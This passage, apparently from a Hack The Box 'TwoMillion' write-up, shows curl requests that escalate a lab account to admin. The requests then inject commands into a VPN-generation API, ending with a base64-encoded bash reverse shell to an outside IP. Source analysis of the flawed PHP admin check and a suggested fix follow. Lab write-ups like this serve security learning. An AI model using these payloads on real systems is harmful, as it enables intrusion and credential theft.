&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">{&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;status&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;danger&amp;#34;&lt;/span>,&lt;span style="color:#b8bb26">&amp;#34;message&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;Missing parameter: email&amp;#34;&lt;/span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> curl -XPUT &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/settings/update&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;email&amp;#34;: &amp;#34;admin@2million.htb&amp;#34;}&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">{&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;status&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;danger&amp;#34;&lt;/span>,&lt;span style="color:#b8bb26">&amp;#34;message&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;Missing parameter: is_admin&amp;#34;&lt;/span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> curl -XPUT &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/settings/update&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;email&amp;#34;: &amp;#34;admin@2million.htb&amp;#34;, &amp;#34;is_admin&amp;#34;: 1}&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">{&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;status&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;danger&amp;#34;&lt;/span>,&lt;span style="color:#b8bb26">&amp;#34;message&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;Email not found.&amp;#34;&lt;/span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>After some trial and error we got all of the necessary parameters. Now lets try using the email we created the account with and see what happens.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl -XPUT &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/settings/update&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;email&amp;#34;: &amp;#34;randomuser@2million.htb&amp;#34;, &amp;#34;is_admin&amp;#34;: 1}&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">{&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;id&amp;#34;&lt;/span>:14,&lt;span style="color:#b8bb26">&amp;#34;username&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;randomuser&amp;#34;&lt;/span>,&lt;span style="color:#b8bb26">&amp;#34;is_admin&amp;#34;&lt;/span>:1&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Great! looks like we are admin now. Let&amp;rsquo;s confirm it by sending a request to the &lt;code>/admin/auth&lt;/code> api endpoint.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl -XGET &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/auth&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">{&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;message&amp;#34;&lt;/span>:true&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Yup we are admin!&lt;/p>
&lt;p>Let&amp;rsquo;s check the &lt;code>/api/v1/admin/vpn/generate&lt;/code> endpoint. Again after some trial and error we can see that it requires a &lt;code>username&lt;/code> parameter to work. Let&amp;rsquo;s give it ours and see the generated output.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl -XPOST &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/vpn/generate&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;username&amp;#34;: &amp;#34;randomuser&amp;#34;}&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>client
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dev tun
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>proto udp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>remote edge-eu-free-1.2million.htb &lt;span style="color:#d3869b">1337&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>resolv-retry infinite
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>nobind
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>persist-key
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>persist-tun
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>remote-cert-tls server
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>comp-lzo
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>verb &lt;span style="color:#d3869b">3&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>data-ciphers-fallback AES-128-CBC
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>tls-cipher &lt;span style="color:#b8bb26">&amp;#34;DEFAULT:@SECLEVEL=0&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>auth SHA256
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>key-direction &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&amp;lt;ca&amp;gt;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>..........SNIP..........
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-----END OpenVPN Static key V1-----
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&amp;lt;/tls-auth&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>If you check the vpn file generated we can see that the value of the &lt;code>username&lt;/code> parameter is reflected in there:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/vpn.webp" alt="">&lt;p>If proper validation is not done then we could try some injection type vulerability and check if anything is working.&lt;/p>
&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="rce">RCE&lt;/h2>
&lt;p>We can see that the username is reflecting in the vpn file generated. First I tested for rce in the &lt;code>username&lt;/code> parameter. But unfortunately the output is not showing when the username is changed so something is stopping the execution when we input rce payloads. One way w can test the rce is by using the &lt;code>sleep&lt;/code> command and check the time delay:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">time&lt;/span> curl --silent -XPOST &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/vpn/generate&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;username&amp;#34;: &amp;#34;randomuser&amp;#34;}&amp;#39;&lt;/span> &amp;gt; &lt;span style="color:#fabd2f">test&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>________________________________________________________
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Executed in 1.81 secs fish external
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usr &lt;span style="color:#fabd2f">time&lt;/span> 8.23 millis 1.21 millis 7.03 millis
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> sys &lt;span style="color:#fabd2f">time&lt;/span> 7.17 millis 0.14 millis 7.03 millis
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">time&lt;/span> curl --silent -XPOST &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/vpn/generate&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;username&amp;#34;: &amp;#34;randomuser;sleep 5&amp;#34;}&amp;#39;&lt;/span> &amp;gt; &lt;span style="color:#fabd2f">test&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>________________________________________________________
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Executed in 6.21 secs fish external
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> usr &lt;span style="color:#fabd2f">time&lt;/span> 11.54 millis 1.06 millis 10.48 millis
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> sys &lt;span style="color:#fabd2f">time&lt;/span> 3.62 millis 0.12 millis 3.50 millis
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>See the time difference:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/rce-test.webp" alt="">&lt;p>Now we can confirm RCE. So let&amp;rsquo;s exploit it by adding a reverse shell payload from &lt;a href="https://www.revshells.com/">revshells.com&lt;/a>&lt;/p>
&lt;p>Here I used base64 encoding to make the payload work without producing any errors.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/revshells.webp" alt="">&lt;p>We can send a POST request with the payload to get a shell:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl --silent -XPOST &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/vpn/generate&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#39;{&amp;#34;username&amp;#34;: &amp;#34;randomuser;echo \&amp;#39;&lt;/span>MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC8xMC4xMC4xNC42MC8xMjM0OyBiYXNoIDwmMTk2ID4mMTk2IDI+JjE5Ng&lt;span style="color:#fe8019">==&lt;/span>&lt;span style="color:#b8bb26">\&amp;#39;&lt;/span>| base64 -d | bash&lt;span style="color:#b8bb26">&amp;#34;}&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And we got shell as &lt;code>www-data&lt;/code>&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/revshell.webp" alt="">&lt;hr>
&lt;h1 id="lateral-movement-to-user">Lateral Movement to user&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;p>There&amp;rsquo;s a &lt;code>.env&lt;/code> file with some database credentials. We could probably use it to check the database for any valuable information or try to use the username and password to ssh into the machine (since &lt;code>admin&lt;/code> user is present in the &lt;code>/etc/passwd&lt;/code> file)&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/db-pass.webp" alt="">&lt;p>But before that let&amp;rsquo;s check what&amp;rsquo;s actually happening in the php files.&lt;/p>
&lt;h2 id="source-code-analysis">Source code analysis:&lt;/h2>
&lt;p>if you check the &lt;code>controllers/AdminController.php&lt;/code> file in the &lt;code>api/v1/admin/update/settings&lt;/code> endpoint they are already checking whether the current user is admin or not. If the &lt;code>$is_admin&lt;/code> variable is false then it simply exits. Then how we are able to visit the endpoint?&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-php" data-lang="php">&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">public&lt;/span> &lt;span style="color:#fe8019">function&lt;/span> &lt;span style="color:#fabd2f">update_settings&lt;/span>($router) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $db &lt;span style="color:#fe8019">=&lt;/span> Database&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">getDatabase&lt;/span>();
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $is_admin &lt;span style="color:#fe8019">=&lt;/span> $this&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">is_admin&lt;/span>($router);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>$is_admin) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> header(&lt;span style="color:#b8bb26">&amp;#34;HTTP/1.1 401 Unauthorized&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It is using the &lt;code>is_admin()&lt;/code> function to check whether we are admin and stores the return value to &lt;code>$is_admin&lt;/code> variable. Then inside and if statement its just checking &lt;code>!$is_admin&lt;/code>.
So the &lt;code>is_admin()&lt;/code> should return either &lt;code>TRUE&lt;/code> or &lt;code>FALSE&lt;/code> right? right?&lt;/p>
&lt;p>NOP!&lt;/p>
&lt;p>The &lt;code>is_admin()&lt;/code> function is just returning a json output and the &lt;code>TRUE&lt;/code> and &lt;code>FALSE&lt;/code> values are just inside the json data:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-php" data-lang="php">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">public&lt;/span> &lt;span style="color:#fe8019">function&lt;/span> &lt;span style="color:#fabd2f">is_admin&lt;/span>($router)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>isset($_SESSION) &lt;span style="color:#fe8019">||&lt;/span> &lt;span style="color:#fe8019">!&lt;/span>isset($_SESSION[&lt;span style="color:#b8bb26">&amp;#39;loggedin&amp;#39;&lt;/span>]) &lt;span style="color:#fe8019">||&lt;/span> $_SESSION[&lt;span style="color:#b8bb26">&amp;#39;loggedin&amp;#39;&lt;/span>] &lt;span style="color:#fe8019">!==&lt;/span> &lt;span style="color:#fe8019">true&lt;/span> &lt;span style="color:#fe8019">||&lt;/span> &lt;span style="color:#fe8019">!&lt;/span>isset($_SESSION[&lt;span style="color:#b8bb26">&amp;#39;username&amp;#39;&lt;/span>])) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> header(&lt;span style="color:#b8bb26">&amp;#34;HTTP/1.1 401 Unauthorized&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $db &lt;span style="color:#fe8019">=&lt;/span> Database&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">getDatabase&lt;/span>();
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $stmt &lt;span style="color:#fe8019">=&lt;/span> $db&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">query&lt;/span>(&lt;span style="color:#b8bb26">&amp;#39;SELECT is_admin FROM users WHERE username = ?&amp;#39;&lt;/span>, [&lt;span style="color:#b8bb26">&amp;#39;s&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> [$_SESSION[&lt;span style="color:#b8bb26">&amp;#39;username&amp;#39;&lt;/span>]]]);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $user &lt;span style="color:#fe8019">=&lt;/span> $stmt&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">fetch_assoc&lt;/span>();
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> ($user[&lt;span style="color:#b8bb26">&amp;#39;is_admin&amp;#39;&lt;/span>] &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> header(&lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> json_encode([&lt;span style="color:#b8bb26">&amp;#39;message&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#fe8019">TRUE&lt;/span>]);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> } &lt;span style="color:#fe8019">else&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> header(&lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> json_encode([&lt;span style="color:#b8bb26">&amp;#39;message&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#fe8019">FALSE&lt;/span>]);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>So whatever the return value is the if block inside the &lt;code>update_settings()&lt;/code> function is just not going to work. Because the value of &lt;code>$is_admin&lt;/code> will never be interpreted as &lt;code>FALSE&lt;/code>.
In order to fix the issue we have to use &lt;code>json_decode()&lt;/code> and check the value of &lt;code>message&lt;/code>. It would be something like this:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-php" data-lang="php">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">``&lt;/span>`php
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">public&lt;/span> &lt;span style="color:#fe8019">function&lt;/span> &lt;span style="color:#fabd2f">update_settings&lt;/span>($router) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $db &lt;span style="color:#fe8019">=&lt;/span> Database&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">getDatabase&lt;/span>();
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $json &lt;span style="color:#fe8019">=&lt;/span> json_decode($this&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">is_admin&lt;/span>($router));
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>$json&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">message&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> header(&lt;span style="color:#b8bb26">&amp;#34;HTTP/1.1 401 Unauthorized&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Hopefully this should work (I haven&amp;rsquo;t tested it).&lt;/p>
&lt;p>Ok now let&amp;rsquo;s move on the &lt;code>controllers/VPNController.php&lt;/code> file where the &lt;code>/api/v1/admin/vpn/generate&lt;/code> endpoint is defined:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-php" data-lang="php">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">public&lt;/span> &lt;span style="color:#fe8019">function&lt;/span> &lt;span style="color:#fabd2f">admin_vpn&lt;/span>($router) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>isset($_SESSION[&lt;span style="color:#b8bb26">&amp;#39;loggedin&amp;#39;&lt;/span>]) &lt;span style="color:#fe8019">||&lt;/span> $_SESSION[&lt;span style="color:#b8bb26">&amp;#39;loggedin&amp;#39;&lt;/span>] &lt;span style="color:#fe8019">!==&lt;/span> &lt;span style="color:#fe8019">true&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> header(&lt;span style="color:#b8bb26">&amp;#34;HTTP/1.1 401 Unauthorized&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>isset($_SESSION[&lt;span style="color:#b8bb26">&amp;#39;is_admin&amp;#39;&lt;/span>]) &lt;span style="color:#fe8019">||&lt;/span> $_SESSION[&lt;span style="color:#b8bb26">&amp;#39;is_admin&amp;#39;&lt;/span>] &lt;span style="color:#fe8019">!==&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> header(&lt;span style="color:#b8bb26">&amp;#34;HTTP/1.1 401 Unauthorized&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>isset($_SERVER[&lt;span style="color:#b8bb26">&amp;#39;CONTENT_TYPE&amp;#39;&lt;/span>]) &lt;span style="color:#fe8019">||&lt;/span> $_SERVER[&lt;span style="color:#b8bb26">&amp;#39;CONTENT_TYPE&amp;#39;&lt;/span>] &lt;span style="color:#fe8019">!==&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;application/json&amp;#39;&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> json_encode([
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;status&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;danger&amp;#39;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;message&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;Invalid content type.&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ]);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $body &lt;span style="color:#fe8019">=&lt;/span> file_get_contents(&lt;span style="color:#b8bb26">&amp;#39;php://input&amp;#39;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $json &lt;span style="color:#fe8019">=&lt;/span> json_decode($body);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>isset($json)) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> json_encode([
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;status&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;danger&amp;#39;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;message&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;Missing parameter: username&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ]);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>$json&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">username&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> json_encode([
